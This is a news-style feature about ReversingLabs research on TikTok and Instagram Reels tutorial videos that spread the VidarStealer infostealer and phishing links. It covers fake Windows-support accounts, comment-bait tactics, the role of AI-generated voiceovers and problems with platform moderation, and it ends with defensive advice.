From Reels to risks: How scammers are turning videos into malware traps

Cybercriminals are moving beyond email scams and into social media feeds, using tutorial-style videos on TikTok and Instagram to spread malware and steal credentials

You are scrolling through Instagram when a video appears showing how to unlock Spotify Premium for free. The clip has a polished voiceover, simple step-by-step instructions, and more than 100,000 views. It looks no different from the countless tutorials users save and revisit every day. You follow the steps. Days later, your passwords, financial information, and stored credentials are in someone else's hands.

 

That scenario is no longer hypothetical. Researchers at ReversingLabs recently uncovered two separate cybercrime campaigns operating through TikTok and Instagram Reels, using tutorial-style short videos to trick users into downloading malware or handing over sensitive information through malicious websites. The attacks succeed not because they are highly sophisticated, but because they feel familiar, carefully designed to blend into platforms users already trust.

 

 

At the centre of these campaigns is VidarStealer, a malware-as-a-service infostealer built to harvest passwords, browser data, cryptocurrency wallet information, and other credentials. With subscriptions reportedly starting at around $300, the tool has dramatically lowered the barrier to entry for cybercriminals, making large-scale social media scams easier and cheaper to launch than ever before.

How social media became a malware playground

Researchers at cybersecurity firm ReversingLabs (RL) have documented two social engineering attack techniques that target users through short-form videos, primarily on TikTok and Instagram Reels. The campaigns, which promise free access to paid software like Spotify Premium and Microsoft Word, represent a significant evolution in how phishing operates. Instead of phishing emails, cybercriminals are now hiding in plain sight on social media, blending their schemes into the creator content users trust and engage with daily.

 

People are already looking for scams in their email inboxes and text messages, but not as much on their social media feeds, especially when posts are framed as being helpful rather than carrying the urgency or sob stories associated with stereotypical phishing attempts.

 

That shift in framing is precisely what makes these campaigns effective. A tutorial about unlocking Spotify Premium looks, in every respect, like the thousands of legitimate life-hack videos that populate a user's feed. There is no misspelled domain name in a subject line, no unfamiliar sender. There is just a video, and it looks like every other video.

 

Using social media is free and rewards frequent uploads. By using multiple platforms, accounts, and posts, attackers are able to access many users. The economics are attractive: no bulk email infrastructure, no cost per send, and a built-in recommendation engine willing to do the distribution work.

The growing role of social media as a search and discovery platform

Social media platforms are no longer just spaces for entertainment; they have quietly become the internet's new search layer. Google itself has confirmed that over 40 percent of Gen Z prefer Instagram or TikTok over Google for search, while Google usage among Gen Z has dropped by nearly 25 percent compared to Gen X. According to GRIN's report, The Power of Influence, Instagram now leads product discovery among Gen Z at 30.4 percent, followed by TikTok at 23.2 percent, with Google trailing at 18.8 percent. Users are not just passively scrolling; they are actively searching for software guides, tech fixes, and product recommendations through the feed.

 

This behavioural shift has created a significant opening for attackers. On TikTok, people do not just scroll for inspiration, but actively look for answers, whether finding a restaurant, a solution to a problem, or an honest product review, increasingly going straight to TikTok instead of Google.

 

The malicious campaigns documented by ReversingLabs are built precisely for this environment, using descriptions and tags to make content appear as legitimate customer support pages, positioning themselves directly in the path of users who are already looking for help. When the feed doubles as a search engine, a malicious tutorial is only one recommendation away.

Two campaigns, two playbooks

RL's researchers identified two distinct approaches, each designed to game social media differently.

 

The first involves fake tutorial accounts built to impersonate legitimate tech support. The malicious accounts use usernames like "windows.tips" or "windows.insights" and the same blue and white profile picture, mirroring the colour palette of the official Windows social media account to establish credibility. The videos themselves are clean and professional, featuring what appear to be AI-generated voiceovers walking viewers through step-by-step instructions, for instance, how to access Windows PowerShell and run a command to supposedly unlock Spotify Premium for free.

 

A non-technical user would not know any better and may assume the tutorial is legitimate. Attackers rely on this lack of understanding. The command used will download scripts from a specified address, and some users may believe the domain is Microsoft-affiliated or otherwise trustworthy. What is actually downloaded is something else entirely.

 

The file delivered through the command is identified as VidarStealer, a popular infostealer malware-as-a-service (MaaS) offering that steals credentials, financial information, and tokens from victims. With an affordable $300 lifetime licence, it is a widely used tool by malicious actors, with usage documented across fake game cheats, malvertising campaigns, and more.

 

The second campaign takes a different approach. It relies on short videos set to trending music, showing off features of premium software with on-screen text claiming the user has unlocked them for free. The accounts behind these videos appear like regular users at first glance, but their profiles are typically filled with repetitive, near-identical clips promoting free access to services like Spotify Premium and similar tools.

 

These vague videos prompt users to ask questions in the comments, wondering how the poster managed to get free access. This curiosity plays directly into what the attacker wants. Some videos actively encourage viewers to comment with certain phrases, a strategy borrowed from non-malicious creators like recipe writers who use it to build engagement and foster an audience relationship. Once engagement builds, the attacker replies with directions pointing toward malicious download sites.

Why social media video is trusted more

The success of both campaigns is not accidental. It is rooted in how users relate to video content. What makes these videos dangerous is how clean and professional they are, creating a false sense of authority. Tutorials are frequently liked and saved, as users want to return to them. Saving is a valuable interaction for posts, causing the platform algorithm to push content to more users.

 

Users may also share tutorials, creating more engagement that content-serving algorithms favour. In one documented example, a video with over 100,000 views had nearly 200 more saves than likes, demonstrating how attackers are specifically targeting the more algorithmically valuable forms of engagement. Each save is a vote of confidence in the algorithm's eyes and a further amplification of reach.

 

This is a deliberate strategy, not incidental. Attackers understand how platform recommendation systems work and produce content calibrated to exploit them. 

The role of AI in scaling attacks

Running a social media account is a very low-time-investment endeavour, and with AI voice and video generation, videos are becoming easier to mass-produce. Social media provides ample opportunities for attackers to access victims, and there will likely be increasing numbers of these accounts and videos in the coming years.

 

The ReversingLabs analysis found that at least some of these tutorial videos already use AI-generated voiceovers, giving them a polished quality that signals legitimacy to casual viewers. As AI generation tools become more accessible and cheaper, the barrier to producing convincing, high-volume campaigns drops further. What once required a professional setup — like clean graphics, a confident voice, and a plausible script — can now be assembled in minutes.

 

Tools such as ChatGPT, Gemini, Midjourney, Adobe Firefly, Runway, and ElevenLabs have dramatically lowered the barrier to content creation. What once required design skills, video-editing software, or professional voiceover equipment can now be produced in minutes using AI-generated images, videos, and audio. This accessibility is not only helping creators but also making it easier for cybercriminals to produce convincing scam content at scale.

Why platforms are struggling to respond

These techniques are difficult to defend against, like any social engineering method. Users who identify the malicious intent may try to warn others in the comments, but most platforms allow creators to delete comments and block commenters, so diligent attackers can suppress this resistance.

 

Reporting suspicious videos does not always lead to quick action. In their investigation, ReversingLabs researchers reported several scam-related posts on Instagram, but the platform rejected those reports. This highlights a broader challenge for social media companies: harmful content can remain online even after users flag it.

 

Part of the problem is that moderation systems do not always recognise these videos as dangerous. Even when a report is reviewed by a person, they may not have the cybersecurity expertise needed to understand how a seemingly harmless tutorial could be directing users to malware or phishing websites. As a result, scam videos can continue to spread and attract victims before they are eventually removed, if they are removed at all.

 

Even when a social media video or account is taken down, it is likely only after it has amassed a large number of views, and threat actors can easily start anew.

 

The structural mismatch between how fast bad content spreads and how slowly platforms respond creates a window that attackers are actively exploiting.

 

Removing a scam video or banning an account does not necessarily solve the problem. By the time platforms take action, the content may have already reached thousands or even millions of users. In many cases, attackers have already achieved their goal of spreading malware or collecting personal information.

 

What makes the issue even harder to tackle is how quickly cybercriminals can create new accounts and upload fresh content. While harmful videos can spread within hours, platform moderation and review processes often take much longer. This gap between the speed of attackers and the speed of enforcement allows cybercriminals to continue targeting users and expanding their reach.

What platforms and users can do to stay protected

Social media scams are becoming harder to spot because they often look like ordinary tutorials or product recommendations. As attackers adapt their tactics, both users and organisations need to broaden their approach to online safety.

 

Recommended precautions

• Audit software installation permissions
• Update phishing awareness training
• Treat social media as a phishing vector
• Report suspicious videos and accounts
• Be cautious of "free premium software" claims

One of the key defences against this kind of attack is to regularly audit permissions, ensuring people with installation privileges understand what they are installing. Most examples described in the analysis involve leisure software, but some promise access to professional software, which employees may deem useful enough to attempt to install on work devices.

 

Phishing training also needs to be maintained and kept up to date so people are aware of the evolving threat landscape. Organisations must broaden their awareness of a variety of vectors and focus on more than just the typical avenues of phishing.

 

Users are encouraged to report suspicious social media advice even when using personal social media on personal devices. The more reports filed, the more likely it is that accounts are taken down, which does slow down the momentum of attackers.

 

   

The unfortunate reality is that these techniques work. Videos are reaching hundreds of thousands of views, thousands of saves, likes, and shares, and hundreds of comments. These are hugely influential on how well content performs, and these techniques leverage that priority. The threat, in other words, is not theoretical. It is already reaching a very large audience — one scroll at a time.